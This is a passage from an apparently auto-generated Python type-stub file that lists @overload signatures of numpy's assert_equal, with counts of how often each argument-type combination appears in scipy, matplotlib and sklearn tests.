desired: List[Literal["weak mixing angle"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: list, desired: list):
"""
usage.matplotlib: 2
usage.scipy: 6
"""
...
@overload
def assert_equal(
actual: Literal["299792458 m s^-1"], desired: Literal["299792458 m s^-1"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[float]):
"""
usage.matplotlib: 1
usage.scipy: 19
usage.sklearn: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex256]):
"""
usage.scipy: 16
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex128]):
"""
usage.scipy: 35
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.complex64]):
"""
usage.scipy: 47
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float32]):
"""
usage.scipy: 37
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray, err_msg: str):
"""
usage.scipy: 36
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int32, numpy.int32, numpy.int32], desired: Tuple[int, int, int]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: type, desired: type):
"""
usage.scipy: 10
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int, int, int], desired: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[numpy.ndarray]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[None, ...], desired: Tuple[None, ...]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Tuple[float, float], desired: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float16]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float128]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[Union[int, float]]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int],
desired: Tuple[int, int, int],
err_msg: Literal["nearest"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int],
desired: Tuple[int, int, int],
err_msg: Literal["linear"],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('nearest', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('nearest', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('linear', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('linear', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('cubic', True)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int],
desired: Tuple[int, int],
err_msg: Literal["('cubic', False)"],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int, int],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Literal["nominal", "numeric"]],
desired: List[Literal["nominal", "numeric"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["attr_date_number"], desired: Literal["attr_date_number"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["relational"], desired: Literal["relational"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["attr_date"], desired: Literal["attr_date"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["date"], desired: Literal["date"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["attr_number"], desired: Literal["attr_number"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["numeric"], desired: Literal["numeric"]):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: Literal["attr_relational"], desired: Literal["attr_relational"]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["age"], desired: Literal["age"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["smoker"], desired: Literal["smoker"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["nominal"], desired: Literal["nominal"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[Literal["yes"], Literal["no"]], desired: List[Literal["no", "yes"]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[Literal[" yes"], Literal["no "]],
desired: List[Literal["no ", " yes"]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "width"], Union[None, int]],
desired: Dict[Literal["min", "repeat", "width"], Union[None, int]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], Union[None, int]],
desired: Dict[Literal["min", "repeat", "significand", "width"], Union[None, int]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], Union[int, None]],
desired: Dict[Literal["min", "repeat", "significand", "width"], Union[int, None]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Dict[Literal["min", "repeat", "significand", "width"], int],
desired: Dict[Literal["min", "repeat", "significand", "width"], int],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(I10)"], desired: Literal["(I10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(I12.10)"], desired: Literal["(I12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(3I12.10)"], desired: Literal["(3I12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E10.5)"], desired: Literal["(E10.5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E12.10)"], desired: Literal["(E12.10)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(E12.10E3)"], desired: Literal["(E12.10E3)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["(3E10.5)"], desired: Literal["(3E10.5)"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["inline"], desired: Literal["inline"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testdouble"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testdouble"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststring"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["teststring"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcomplex"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testcomplex"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testmatrix"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testmatrix"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testsparse"], Tuple[int, int], Literal["sparse"]]],
desired: List[Tuple[Literal["testsparse"], Tuple[int, int], Literal["sparse"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[Literal["testsparsecomplex"], Tuple[int, int], Literal["sparse"]]
],
desired: List[
Tuple[Literal["testsparsecomplex"], Tuple[int, int], Literal["sparse"]]
],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["a", "theta"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["a", "theta"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testminus"], Tuple[int, int], Literal["double"]]],
desired: List[Tuple[Literal["testminus"], Tuple[int, int], Literal["double"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testonechar"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["testonechar"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testcell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testscalarcell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testscalarcell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testemptycell"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testemptycell"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststringarray"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["teststringarray"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[
Tuple[Literal["test3dmatrix"], Tuple[int, int, int], Literal["double"]]
],
desired: List[
Tuple[Literal["test3dmatrix"], Tuple[int, int, int], Literal["double"]]
],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststruct"], Tuple[int, int], Literal["struct"]]],
desired: List[Tuple[Literal["teststruct"], Tuple[int, int], Literal["struct"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testcellnest"], Tuple[int, int], Literal["cell"]]],
desired: List[Tuple[Literal["testcellnest"], Tuple[int, int], Literal["cell"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststructnest"], Tuple[int, int], Literal["struct"]]],
desired: List[Tuple[Literal["teststructnest"], Tuple[int, int], Literal["struct"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["teststructarr"], Tuple[int, int], Literal["struct"]]],
desired: List[Tuple[Literal["teststructarr"], Tuple[int, int], Literal["struct"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testobject"], Tuple[int, int], Literal["object"]]],
desired: List[Tuple[Literal["testobject"], Tuple[int, int], Literal["object"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testunicode"], Tuple[int], Literal["char"]]],
desired: List[Tuple[Literal["testunicode"], Tuple[int], Literal["char"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Tuple[Literal["testbools"], Tuple[int, int], Literal["logical"]]],
desired: List[Tuple[Literal["testbools"], Tuple[int, int], Literal["logical"]]],
err_msg: str,
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Literal["avar"]], desired: List[Literal["avar"]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: set, desired: set):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: Type[numpy.float64], desired: Type[numpy.float64]):
"""
usage.scipy: 12
"""
...
@overload
def assert_equal(actual: Type[numpy.str_], desired: Type[numpy.str_]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.int64], desired: Type[numpy.int64]):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: Type[numpy.object_], desired: Type[numpy.object_]):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["python"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["not perl"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["a string"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: int, desired: bool):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Type[numpy.uint8], desired: Type[numpy.uint8]):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: Literal["u"], desired: Literal["u"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["f"], desired: Literal["f"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[Literal["theta"]], desired: List[Literal["theta"]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["arr"], desired: Literal["arr"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["mystr"], desired: Literal["mystr"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["mynum"], desired: Literal["mynum"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["Schrödinger"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.bool_], desired: Type[numpy.bool_]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["� am broken"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: bytes, desired: bytes):
"""
usage.scipy: 24
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal[" "]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bytes, desired: bytes, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int16, desired: numpy.int16):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Type[numpy.int16], desired: Type[numpy.int16]):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: Type[numpy.int32], desired: Type[numpy.int32]):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: Type[numpy.float32], desired: Type[numpy.float32]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: numpy.complex64, desired: numpy.complex64):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Type[numpy.complex64], desired: Type[numpy.complex64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bytes, desired: numpy.bytes_):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.bytes_], desired: Type[numpy.bytes_]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.complex128, desired: numpy.complex128):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: Type[numpy.complex128], desired: Type[numpy.complex128]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.uint16, desired: numpy.uint16):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Type[numpy.uint16], desired: Type[numpy.uint16]):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(actual: numpy.uint32, desired: numpy.uint32):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Type[numpy.uint32], desired: Type[numpy.uint32]):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(actual: Type[numpy.uint64], desired: Type[numpy.uint64]):
"""
usage.scipy: 6
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int, int, int],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["general"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["unsigned-integer"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["unsigned-integer"], Literal["general"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, Literal["array"], Literal["real"], Literal["general"]],
desired: Tuple[
int, int, int, Literal["array"], Literal["real"], Literal["general"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["complex"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["complex"], Literal["general"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["symmetric"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["symmetric"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int,
int,
int,
Literal["array"],
Literal["unsigned-integer"],
Literal["symmetric"],
],
desired: Tuple[
int,
int,
int,
Literal["array"],
Literal["unsigned-integer"],
Literal["symmetric"],
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["skew-symmetric"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["integer"], Literal["skew-symmetric"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[List[int]], desired: numpy.ndarray):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["real"], Literal["skew-symmetric"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["real"], Literal["skew-symmetric"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["complex"], Literal["hermitian"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["complex"], Literal["hermitian"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["array"], Literal["real"], Literal["symmetric"]
],
desired: Tuple[
int, int, int, Literal["array"], Literal["real"], Literal["symmetric"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["integer"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["integer"], Literal["general"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.matrix, desired: numpy.matrix):
"""
usage.scipy: 154
"""
...
@overload
def assert_equal(
actual: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["unsigned-integer"],
Literal["general"],
],
desired: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["unsigned-integer"],
Literal["general"],
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["general"]
],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["complex"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["complex"], Literal["general"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["integer"], Literal["symmetric"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["integer"], Literal["symmetric"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["unsigned-integer"],
Literal["symmetric"],
],
desired: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["unsigned-integer"],
Literal["symmetric"],
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["integer"],
Literal["skew-symmetric"],
],
desired: Tuple[
int,
int,
int,
Literal["coordinate"],
Literal["integer"],
Literal["skew-symmetric"],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["skew-symmetric"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["skew-symmetric"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["complex"], Literal["hermitian"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["complex"], Literal["hermitian"]
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["symmetric"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["real"], Literal["symmetric"]
],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["pattern"], Literal["general"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["pattern"], Literal["general"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.matrix):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(
actual: Tuple[
int, int, int, Literal["coordinate"], Literal["pattern"], Literal["symmetric"]
],
desired: Tuple[
int, int, int, Literal["coordinate"], Literal["pattern"], Literal["symmetric"]
],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["data"], desired: Literal["data"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[bool]):
"""
usage.matplotlib: 2
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: numpy.ma.core.MaskedArray, desired: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[bool]]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy.linalg._testutils._FakeMatrix, desired: numpy.ndarray, err_msg: str
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(
actual: scipy.linalg._testutils._FakeMatrix2, desired: numpy.ndarray, err_msg: str
):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: Literal["z"], desired: Literal["z"]):
"""
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: Literal["d"], desired: Literal["d"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["c"], desired: Literal["c"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: bool, desired: bool, err_msg: Literal["[[0, 1], [2, 3]]"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: float, desired: numpy.float32):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: float, desired: numpy.float64):
"""
usage.matplotlib: 1
usage.scipy: 4
"""
...
@overload
def assert_equal(actual: numpy.int32, desired: numpy.int64):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: int, desired: int, err_msg: str):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: int, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: int, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Type[scipy.sparse.csc.csc_matrix],
desired: Type[scipy.sparse.csc.csc_matrix],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: int, desired: int, err_msg: Literal["n = 34"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: int, desired: int, err_msg: Literal["n = 35"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Literal["Something else."], desired: Literal["Something else."]
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: List[numpy.int32], desired: List[numpy.int32]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: List[numpy.int64], desired: List[numpy.int64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["i"], desired: Literal["i"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: List[Tuple[slice[int, int, int]]],
desired: List[Tuple[slice[int, int, int]]],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: List[Tuple[slice[int, int, int], slice[int, int, int]]],
desired: List[Tuple[slice[int, int, int], slice[int, int, int]]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Union[Tuple[slice[int, int, int], slice[int, int, int]], None]],
desired: List[Union[Tuple[slice[int, int, int], slice[int, int, int]], None]],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: float):
"""
usage.scipy: 7
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: float):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.int8,
numpy.int8,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.int8,
numpy.int8,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.uint8,
numpy.uint8,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.uint8,
numpy.uint8,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.int16,
numpy.int16,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.int16,
numpy.int16,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.uint16,
numpy.uint16,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.uint16,
numpy.uint16,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.int32,
numpy.int32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.int32,
numpy.int32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.uint32,
numpy.uint32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.uint32,
numpy.uint32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.int64,
numpy.int64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.int64,
numpy.int64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.uint64,
numpy.uint64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.uint64,
numpy.uint64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.float32,
numpy.float32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.float32,
numpy.float32,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
numpy.float64,
numpy.float64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
desired: Tuple[
numpy.float64,
numpy.float64,
Tuple[numpy.int64, numpy.int64],
Tuple[numpy.int64, numpy.int64],
],
):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Type[numpy.int8], desired: Type[numpy.int8]):
"""
usage.scipy: 5
"""
...
@overload
def assert_equal(actual: Literal["best1exp"], desired: Literal["best1exp"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["_best1"], desired: Literal["_best1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["best1bin"], desired: Literal["best1bin"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["rand1bin"], desired: Literal["rand1bin"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["_rand1"], desired: Literal["_rand1"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["rand1exp"], desired: Literal["rand1exp"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["rand2exp"], desired: Literal["rand2exp"]):
"""
usage.scipy: 2
"""
...
@overload
def assert_equal(actual: Literal["_rand2"], desired: Literal["_rand2"]):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Literal["best2bin"], desired: Literal["best2bin"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Literal["_best2"], desired: Literal["_best2"]):
"""
usage.scipy: 1
"""
...
